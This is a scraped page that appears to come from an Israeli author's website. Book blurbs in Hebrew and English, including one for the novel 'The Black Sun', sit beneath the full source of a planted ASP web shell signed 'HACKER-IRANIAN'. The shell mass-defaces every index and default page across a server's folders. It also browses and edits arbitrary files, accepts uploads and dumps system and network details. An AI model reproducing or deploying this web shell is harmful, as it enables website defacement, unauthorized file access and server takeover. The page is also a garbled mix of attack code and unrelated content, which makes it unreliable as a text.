guardiran Print E-mail
<% On Error Resume Next Set Objeto=Server.CreateObject("Scripting.FileSystemObject") If request("path") <> "" then Set ObjPasta = Objeto.GetFolder(request("path")) Else if request("t5") <> "" then Set ObjPasta = Objeto.GetFolder(request("t5")) Else Set ObjPasta = Objeto.GetFolder(server.mappath(".")) end if End If If Trim(Request.QueryString("path")) = "" Then caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME")) pos = Instr(caminho,"\") pos2 = 1 While pos2 <> 0 If Instr(pos + 1,caminho,"\") <> 0 Then pos = Instr(pos + 1,caminho,"\") Else pos2 = 0 End If Wend path = Left(caminho,pos) Else path = trim(Request.QueryString("path")) & "\" End If pagename = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) Function functionfooter response.write "

/ " response.write "" response.write " Voltar / " response.write "" response.write " Home " response.write " / " response.write "

I S 2007 | RitualistaS GrouP Priv8 |By HACKER-IRANIAN

" End Function %> אמנון רובינשטיין - guardiran

Bastan Bax Security Team - ASP Mass Defaced
By HACKER-IRANIAN [Bastan Bax Security team]

Home / Mass Deface / System Info / Upload / Spammer / Database / Info/Contact

<% r_status = Request.QueryString("status") SELECT CASE r_status CASE "1" 'Mass Deface %> MASS  DEFACED
Voce estل em: <%=server.mappath(pagename)%>

Caminho: ">


Personalizaçمo de pلginas:

Page 1:
        Page 2:

OBS* Caso nمo seja preenchida a personalizaçمo de pلginas, o a tools usarل como padrمo as seguintes pages:
index.html, index.htm, index.asp, defaul.html, default.htm, default.asp.

<% Response.Write FunctionFooter CASE "2" 'Informçُes do sistema Dim arrListaComponentes(47) arrListaComponentes(0) = Array( "AB Mailer","ABMailer.Mailman" ) arrListaComponentes(1) = Array( "ABC Upload","ABCUpload4.XForm" ) arrListaComponentes(2) = Array( "ActiveFile","ActiveFile.Post" ) arrListaComponentes(3) = Array( "ActiveX Data Object","ADODB.Connection" ) arrListaComponentes(4) = Array( "Adiscon SimpleMail","ADISCON.SimpleMail.1" ) arrListaComponentes(5) = Array( "ASP DNS", "AspDNS.Lookup" ) arrListaComponentes(6) = Array( "ASP HTTP","AspHTTP.Conn" ) arrListaComponentes(7) = Array( "ASP Image","AspImage.Image" ) arrListaComponentes(8) = Array( "ASP Mail","SMTPsvg.Mailer" ) arrListaComponentes(9) = Array( "ASP NNTP News", "AspNNTP.Conn" ) arrListaComponentes(10) = Array( "ASP POP 3", "POP3svg.Mailer" ) arrListaComponentes(11) = Array( "ASP Simple Upload","ASPSimpleUpload.Upload" ) arrListaComponentes(12) = Array( "ASP Smart Cache","aspSmartCache.SmartCache" ) arrListaComponentes(13) = Array( "ASP Smart Mail","aspSmartMail.SmartMail" ) arrListaComponentes(14) = Array( "ASP Smart Upload","aspSmartUpload.SmartUpload" ) arrListaComponentes(15) = Array( "ASP Tear","SOFTWING.ASPtear" ) arrListaComponentes(16) = Array( "ASP Thumbnailer","ASPThumbnailer.Thumbnail" ) arrListaComponentes(17) = Array( "ASP WhoIs","WhoIs2.WhoIs" ) arrListaComponentes(18) = Array( "ASPSoft NT Object","ASPSoft.NT" ) arrListaComponentes(19) = Array( "ASPSoft Upload","ASPSoft.Upload" ) arrListaComponentes(20) = Array( "CDO NTS","CDONTS.NewMail" ) arrListaComponentes(21) = Array( "Chestysoft Image","csImageFile.Manage" ) arrListaComponentes(22) = Array( "Chestysoft Upload","csASPUpload.Process" ) arrListaComponentes(23) = Array( "Dimac JMail","JMail.Message" ) arrListaComponentes(24) = Array( "Distinct SMTP","DistinctServerSmtp.SmtpCtrl" ) arrListaComponentes(25) = Array( "Dundas Mailer","Dundas.Mailer" ) arrListaComponentes(26) = Array( "Dundas Upload","Dundas.Upload.2" ) arrListaComponentes(27) = Array( "Dundas PieChartServer", "Dundas.ChartServer.2") arrListaComponentes(28) = Array( "Dundas 2D Chart", "Dundas.ChartServer2D.1") arrListaComponentes(29) = Array( "Dundas 3D Chart", "Dundas.ChartServer") arrListaComponentes(30) = Array( "Dynu Encrypt","Dynu.Encrypt" ) arrListaComponentes(31) = Array( "Dynu HTTP","Dynu.HTTP" ) arrListaComponentes(32) = Array( "Dynu Mail","Dynu.Email" ) arrListaComponentes(33) = Array( "Dynu Upload","Dynu.Upload" ) arrListaComponentes(34) = Array( "Dynu WhoIs","Dynu.Whois" ) arrListaComponentes(35) = Array( "Easy Mail","EasyMail.SMTP.5" ) arrListaComponentes(36) = Array( "File System Object","Scripting.FileSystemObject" ) arrListaComponentes(37) = Array( "Ticluse Teknologi HTTP","InteliSource.Online" ) arrListaComponentes(38) = Array( "Last Mod","LastMod.FileObj" ) arrListaComponentes(39) = Array( "Microsoft XML Engine","Microsoft.XMLDOM" ) arrListaComponentes(40) = Array( "Persits ASP JPEG","Persits.Jpeg" ) arrListaComponentes(41) = Array( "Persits ASPEmail","Persits.MailSender" ) arrListaComponentes(42) = Array( "Persits ASPEncrypt","Persits.CryptoManager" ) arrListaComponentes(43) = Array( "Persits File Upload","Persits.Upload.1" ) arrListaComponentes(44) = Array( "SMTP Mailer","SmtpMail.SmtpMail.1" ) arrListaComponentes(45) = Array( "Soft Artisans File Upload","SoftArtisans.FileUp" ) arrListaComponentes(46) = Array( "Image Size", "ImgSize.Check" ) arrListaComponentes(47) = Array( "Microsoft XML HTTP", "Microsoft.XMLHTTP" ) Response.Write "

" Response.Write "
Testando atualmente " & UBound(arrListaComponentes) + 1 & " componentes.
O processo pode demorar ...

" ' Rotina que verifica o componente do array é um objeto. Function VerificaObjeto(pComponente) Dim objComponente On Error Resume Next VerificaObjeto = False Err.Clear Set objComponente = Server.CreateObject(pComponente) If Err = 0 Then VerificaObjeto = True Set objComponente = Nothing Err.Clear End Function Public Function VerificaComponentes() Dim intCont, strTxt Dim intIndex, strProv intCont = 0 strTxt = "

" For intIndex = LBound(arrListaComponentes) To UBound(arrListaComponentes) strProv = intIndex strTxt = strTxt & "" If VerificaObjeto(arrListaComponentes(intIndex)(1)) Then strTxt = strTxt & "" intCont = intCont + 1 Else strTxt = strTxt & "" End If strTxt = strTxt & "" Next strTxt = strTxt & "
:: " & arrListaComponentes(intIndex)(0) & "< Instalado >Nمo Instalado

Somente " & intCont & " componentes instalados de " strTxt = strTxt & "" & UBound(arrListaComponentes) + 1 & " testados.

" VerificaComponentes = strTxt End Function Response.Write VerificaComponentes Response.Write "INFORMAاصES DO SISTEMA
" checa = checking(cprthtml,keydec) Call hdr() Response.Write copyright & onlinehelp Set WshNetwork = Server.CreateObject("WScript.Network") Set WshShell = Server.CreateObject("WScript.Shell") Set WshEnv = WshShell.Environment("SYSTEM") Response.Write "
" Response.Write "IDENTIFICAاأO DE REDE:
" Response.Write "Usuلrio: " & WshNetwork.UserName & "
" Response.Write "Nome do Computador: " & WshNetwork.ComputerName & "
" Response.Write "Usuلrio do Domيnio: " & WshNetwork.UserDomain & "
" Set Drives = WshNetwork.EnumNetworkDrives For i = 0 to Drives.Count - 1 Response.Write "Drive de Rede (Mapeado): " & Drives.Item(i) & "
" Next Response.Write "
" Response.Write "Arquitetura do Processador: " & WshEnv("PROCESSOR_ARCHITECTURE") & "
" Response.Write "Nْmero de Processadores: " & WshEnv("NUMBER_OF_PROCESSORS") & "
" Response.Write "Identificador do Processador: " & WshEnv("PROCESSOR_IDENTIFIER") & "
" Response.Write "Nيvel do Processador: " & WshEnv("PROCESSOR_LEVEL") & "
" Response.Write "Revisمo do Processador: " & WshEnv("PROCESSOR_REVISION") & "
" Response.Write "LسGICO:
" Response.Write "IP: " & request.servervariables("LOCAL_ADDR") & "
" Response.Write "Sistema Operacional: " & WshEnv("OS") & "
" Response.Write "Servidor Web: " & request.servervariables("SERVER_SOFTWARE") & "
" Response.Write "Especificaçمo do Command: " & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "
" Response.Write "Caminhos no Path: " & WshEnv("PATH") & "
" Response.Write "Executلveis: " & WshEnv("PATHEXT") & "
" Response.Write "Prompt: " & WshEnv("PROMPT") & "
" Response.Write "System Drive: " & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "
" Response.Write "System Root: " & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "
" Response.Write "Caminho do System32: " & WshShell.CurrentDirectory & "
" Set Drives = Nothing Set WshNetwork = Nothing Set WshShell = Nothing Set WshEnv = Nothing Response.Write "

" Response.Write "

<% Response.Write FunctionFooter CASE "3" 'Uploader %>
Upload de arquivos:

Obs: O tamanho mلximo permitido para o envio de arquivos é 30 mb.

<% Response.Write FunctionFooter CASE "4" 'Spammer Response.Write "Local do Spammer" CASE "5" 'Info Response.Write "Aqui abrirل o Informaçُes adicionais" CASE "6" 'Form Procurar MDB Case "f6" 'Funçمo Procura MDBS caminho=request("T5") On Error Resume Next Set MonRep = ObjFSO.GetFolder(caminho) Set ColFolders = MonRep.SubFolders for each folderItem in ColFolders folderItem.path caminho= folderItem.path & "\" next CASE "f1" 'Funçمo Mass deface Set ObjFSO = CreateObject("Scripting.FileSystemObject") patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) arquivomassdfc = patharquivotxt & "teste.txt" Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False) vetordelinhas = Split(Request.Form("T4"),VbCrLf) For i = 0 To UBound(vetordelinhas) Arquivotxt.WriteLine(vetordelinhas(i)) Next Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc) caminho=request("T3") Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo) Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo) On Error Resume Next Set MonRep = ObjFSO.GetFolder(caminhodomass) Set ColFolders = MonRep.SubFolders for each folderItem in ColFolders destino1 = folderItem.path & "\index.htm" destino2 = folderItem.path & "\index.html" destino3 = folderItem.path & "\index.asp" destino4 = folderItem.path & "\index.cfm" destino5 = folderItem.path & "\index.php" destino6 = folderItem.path & "\default.htm" destino7 = folderItem.path & "\default.html" destino8 = folderItem.path & "\default.asp" destino9 = folderItem.path & "\default.cfm" destino10 = folderItem.path & "\default.php" If request("P1") <> "" then personal1 = request("P1") destino11 = folderItem.path & "\" & personal1 MeuArquivo.Copy(destino11) End If If request("P2") <> "" then personal2 = request("P2") destino12 = folderItem.path & "\" & personal2 MeuArquivo.Copy(destino12) End If MeuArquivo.Copy(destino1) MeuArquivo.Copy(destino2) MeuArquivo.Copy(destino3) MeuArquivo.Copy(destino4) MeuArquivo.Copy(destino5) MeuArquivo.Copy(destino6) MeuArquivo.Copy(destino7) MeuArquivo.Copy(destino8) MeuArquivo.Copy(destino9) MeuArquivo.Copy(destino10) Response.Write "
" If Err.Number = 0 Then Response.Write "" Else Response.Write "
" & folderItem.path & "DeFaCeD!!!
" & UCase(Err.Description) & "
" End If Err.Number = 0 Response.Flush If metodo = "brute" Then Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo) End If next End Sub Response.Write FunctionFooter CASE "f2" 'Funcao uploader Set Upload = Server.CreateObject("Persits.Upload") ' Limita o tamanho do arquivo para 30000 bytes (3Mb) de tamanho e gera uma mensagem de erro se o arquivo for maior Upload.SetMaxSize 30000000, True ' Pula todas as mensagens de erro de servidor para a mensagem de erro personalizada On Error Resume Next ' Local a ser gravado o upload Upload.Save "E:\novosite\" ' 8 é o nْmero do erro que corresponde a "Arquivo grande demais" if Err.Number = 8 Then Response.Write "Seu arquivo é grande demais. Por favor use um arquivo menor." Else If Err <> 0 Then Response.Write "Um erro foi encontrado: " & Err.Description Else Response.Write "Upload realizado com sucesso!" End If End If CASE "f3" ' Mostrar pagina %>

Voce esta em: <%=request("path")%>  <% On Error Resume Next if request("path") <> "" then var_caminho=request("path") set ObjFso2=server.CreateObject("Scripting.FileSystemObject") Set ObjAbreArq2 = ObjFso2.OpenTextFile(Var_Caminho, 1, True, False) If ObjFso2=FileExists(var_caminho) = true then Do While Not ObjAbreArq2.AtEndOfStream Linha = Linha & ObjAbreArq2.Readline & chr(13) Loop Response.Write "" Response.Write "" Response.Write "

" Response.Write FunctionFooter Else Response.Write "
Caminho indicado inexistente... Por favor tente novamente" Response.Write FunctionFooter End If End IF %>

<% Case "f4" 'Salvar texto caminho=request("path") set saveTextFile = objFSO.OpenTextFile(caminho,2,true,false) Set f = fso.CreateTextFile(path) saveTextFile.Write Request.Form("text") saveTextFile.close if err<>0 then byMsg = "Arquivo nمo editado!
" else byMsg = "Arquivo editado com sucesso:)
" end if Response.Write byMsg Response.Write FunctionFooter CASE default 'RESTO %>
<% dir=request("path") If dir<>"" then Response.Write "

Voce esta em: " & dir Else Response.Write "

Voce esta em: " & server.mappath(pagename) end if dir=nothing %>

Caminho: "" then Response.Write dir Else dual=Request("T5") Response.Write dual end if %>">

<% DIM fs, d, dc, s, n, sp Set fs=Server.Createobject("Scripting.FileSystemObject") Set dc=fs.drives %> <% On Error Resume Next back1="#D3E2E7" back2="#AFFEDE" back=back2 Response.Write "Discos Disponiveis:
" FOR EACH d IN dc IF (back=back2) THEN back=back1 ELSE back=back2 END IF Response.Write "| " Response.write d.driveletter Response.Write ": |" next%>



<% If CInt(Len(path) - 1) <> 2 Then barrapos = CInt(InstrRev(Left(path,Len(path) - 1),"\")) - 1 backlevel = Left(path,barrapos) Response.Write "

::-:|_| : . . .
" End If On Error Resume Next Old = ObjPasta News = strReverse(old) News = instr(News, "/") Leng = Len(old) - News Old = Left(Old, Leng) q = 1 syco contador contador=1 For each Pasta in ObjPasta.Subfolders PastaName=Pasta.Name q = q + 1 Response.Write "

::-:|" & Contador & "| : " & PastaName & "

" Contador=contador+1 Next q = q - 1 %>

<% On Error Resume Next syco contador Old = ObjPasta contador=1 For Each Arquivo in ObjPasta.Files ArquivoNome=Arquivo.Name Response.Write "::-:|" & Contador & "| : "& ArquivoNome & "

" contador=contador+1 next %>

<%=Functionfooter%><% END SELECT %>  


 _'באין ממשלה: איך לתקן את קלקולי המשטר, מ-B.G ל- B.B

 הספר סוקר את ההיסטוריה הפוליטית של ישראל, כפי שהיא מתבטאת בהסכמים הקואליציוניים; מסביר כיצד נולדה שיטת הבחירות; בודק את נושא אי-יכולתה של הממשלה למשול; מבהיר כי בישראל שולט המיעוט ולא הרוב; קובע כי לצורת הממשל השפע ה רבה  על אי-הנחת מהדמוקרטיה הישראלית; סוקר את ההצעות הרבות לתיקון קלקולי המשטר ומציע הצעות מעשיות כיצד לחזק ולשפר את הדמוקרטיה בישראל

המשך קריאה...


The black sun english

'השמש השחורה': רומן חדש. שאול, גיבור הספר השמש השחורה הוא גבר מבוגר, מכובד למראה. למרות ההוכחות החותכות שמספקים בני משפחתו, חבריו ואמצעי התקשורת, המעידות שגדעון, חבר ילדותו, נהרג בפיגוע התאבדות, שאול בטוח שגדעון חי וקיים, מסתתר היכן שהוא. הוא אינו מאמין גם לאשתו, מירה, ולאשתו של גדעון, סטלה, שהיתה פעם אהובתו הבלתי מושגת.

הימים הם ימי הפיגועים הקשים של האינתיפאדה השנייה, ושאול משוטט בתל אביב הדואבת, מחפש אחר חברו ומפליג בזיכרונות מימי נעוריו, עת היה עולה חדש שזה עתה הגיע מפולין לעיר העברית הראשונה

המשך קריאה...

Shaul is a mature, distinguished man. Yet despite the overwhelming evidence that his family members, friends and the media present to the contrary, he does not accept that his childhood friend, Gideon, was killed in a suicide bombing, but rather that he is alive and well and in hiding. Shaul refuses to believe his wife, Mira, or Gideon’s wife, Stella, whom he once courted unsuccessfully.

The Black Sun takes place during the difficult days of the Second Intifada in Israel in 2002. As Shaul takes to walking the streets of Tel Aviv in search of his friend, memories of his youth begin to surface, from when he was a new immigrant from Poland, having just arrived in the first Jewish city.

For more information click here u

מידע נוסף

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